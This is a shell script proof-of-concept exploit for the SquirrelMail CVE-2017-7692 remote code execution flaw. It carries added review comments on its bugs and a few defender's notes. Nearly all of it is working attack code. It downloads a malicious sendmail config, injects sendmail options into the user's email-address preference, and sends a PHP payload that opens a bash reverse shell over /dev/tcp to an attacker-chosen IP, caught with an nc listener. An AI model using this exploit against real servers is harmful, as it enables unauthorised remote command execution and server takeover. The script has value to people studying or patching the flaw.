- # Quick and messy PoC for SquirrelMail webmail application.
- # It contains payloads for 2 vectors:
- # * File Write
- # * RCE
- # It requires user credentials and that SquirrelMail uses
- # Sendmail method as email delivery transport
- #
- #
- # Full advisory URL:
- # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
- #
- # Tested on: # Ubuntu 16.04
- # squirrelmail package version:
- # 2:1.4.23~svn20120406-2ubuntu1.16.04.1
- #
- # Disclaimer:
- # For testing purposes only
- #
- #
- # -----------------------------------------------------------------
- #
- # Interested in vulns/exploitation?
- # Stay tuned for my new project - ExploitBox
- #
- # .;lc'
- # .,cdkkOOOko;.
- # .,lxxkkkkOOOO000Ol'
- # .':oxxxxxkkkkOOOO0000KK0x:'
- # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
- # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
- # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
- # .ddc;,,:c;. ,c: .cxxc:;:ox:
- # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
- # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
- # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
- # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
- # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
- # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
- # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
- # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
- # .dxxxxxdl;. ., .. .;cdxxxxxx:
- # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
- # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
- # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
- # .':oxxxxxxxxx.ckkkkkkkkxl,.
- # .,cdxxxxx.ckkkkkxc.
- # .':odx.ckxl,.
- # .,.'.
- #
- # https://ExploitBox.io
- #
- # https://twitter.com/Exploit_Box
- #
- # -----------------------------------------------------------------
- #
- # Reading notes (review):
- # * Flat script with no `set -e`/`pipefail`; every status check below is
- #   `$?` taken after a pipeline, so only the final `grep` stage is observed.
- # * Fixed, predictable scratch paths are used and never cleaned up:
- #   /tmp/sqdata (login response headers), /tmp/smcnf-exp (downloaded
- #   sendmail config), /tmp/sheaders (send response headers). These are
- #   artifacts left on the host that runs the script.
- # * Defender's view: the value that carries the attack is the account's
- #   email-address preference (the `new_email_address=` form field below);
- #   the patched release referenced in the advisory URL above is the fix.
- # Attachment spool directory assumed on the target; only used to build the
- # `-C` payload path for choice 2 below.
- sqspool="/var/spool/squirrelmail/attach/"
- # `$int` is never assigned in this script; unless it comes from the
- # environment this prints an empty line (leftover from the commented-out
- # banner that follows).
- echo -e "$int"
- #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
- #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
- #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
- # Base URL
- if [ $# -ne 1 ]; then
- echo -e "Usage: \n$0 SquirrelMail_URL"
- echo -e "Example: \n$0 http://target/squirrelmail/ \n"
- exit 2
- fi
- URL="$1"
- # Log in
- echo -e "\n[*] Enter SquirrelMail user credentials"
- read -p "user: " squser
- read -sp "pass: " sqpass
- echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
- # The credentials are handed to curl as a command-line argument (`-d`), so
- # they are visible in the process list and in any `set -x` trace for the
- # duration of the request. Response headers are dumped to the fixed file
- # /tmp/sqdata; a failed login is detected only by the word "incorrect"
- # appearing in the response body.
- curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
- if [ $? -eq 0 ]; then
- echo "Invalid creds"
- exit 2
- fi
- # Session id and key are scraped from the saved headers. `grep key`
- # matches any header line containing "key", not only the `key=` cookie;
- # the last match wins (`tail -n1`).
- sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
- keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
- # Prepare Sendmail cnf
- #
- # * The config will launch php via the following stanza:
- #
- # Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
- # T=DNS/RFC822/X-Unix,
- # A=php -- $u $h ${client_addr}
- #
- # The config is fetched from a remote URL at run time with no integrity
- # check (no pinned hash), so what the script uploads is whatever that URL
- # serves at that moment. Saved to the fixed path /tmp/smcnf-exp.
- wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
- # Upload config
- echo -e "\n\n[*] Uploading Sendmail config"
- # The `smtoken` form token is scraped from the compose page.
- token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
- # `$mail` is not assigned anywhere in this script, so `send_to=` is sent
- # empty. The attachment id is parsed out of the response and checked to be
- # at least 32 characters below.
- attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
- if [ ${#attachid} -lt 32 ]; then
- echo "Something went wrong. Failed to upload the sendmail file."
- exit 2
- fi
- # Create Sendmail cmd string according to selected payload
- echo -e "\n\n[?] Select payload\n"
- # SELECT PAYLOAD
- echo "1 - File write (into /tmp/sqpoc)"
- echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
- echo
- read -p "[1-2] " pchoice
- # Defender's view: both variants place sendmail option-like tokens in the
- # account's email-address preference, which is what a patched server must
- # reject. Any answer other than 1 or 2 leaves `$payload` empty, and a
- # non-numeric answer makes the `-eq` tests below fail with an error.
- case $pchoice in
- 1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"
- ;;
- 2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"
- ;;
- esac
- if [ $pchoice -eq 2 ]; then
- echo
- read -p "Reverese shell IP: " reverse_ip
- read -p "Reverese shell PORT: " reverse_port
- fi
- # Reverse shell code
- # Built unconditionally: for choice 1, $reverse_ip and $reverse_port are
- # unset and the text is still sent as the message body.
- phprevsh="
- <?php
- \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
- file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
- system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
- ?>"
- # Set sendmail params in user settings
- echo -e "\n[*] Injecting Sendmail command parameters"
- # A fresh `smtoken` is scraped for the options page.
- token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
- # `2>/dev/null` applies to grep only, not to curl. Success is inferred from
- # the word "Success" in the response body.
- curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
- if [ $? -ne 0 ]; then
- echo "Failed to inject sendmail parameters"
- exit 2
- fi
- # Send email which triggers the RCE vuln and runs phprevsh
- echo -e "\n[*] Sending the email to trigger the vuln"
- # Sent from a background subshell after a 2 s delay (presumably so the
- # listener below is up first). Its response headers go to the fixed file
- # /tmp/sheaders; the job is never `wait`ed on.
- (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
- -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
- if [ $pchoice -eq 2 ]; then
- echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
- # `-l -p PORT` is the traditional/GNU netcat spelling; other netcat
- # variants take different flags — TODO confirm on the host.
- nc -vv -l -p $reverse_port
- else
- echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
- fi
- # For choice 1 this runs immediately, before the background curl above has
- # completed (or even started, because of the sleep), so /tmp/sheaders may
- # be missing or left over from an earlier run. grep exits 2 when the file
- # does not exist, which the `-eq 1` test below does not catch.
- grep -q "302 Found" /tmp/sheaders
- if [ $? -eq 1 ]; then
- echo "There was a problem with sending email"
- exit 2
- fi
- # Done
- echo -e "\n[*] All done. Exiting"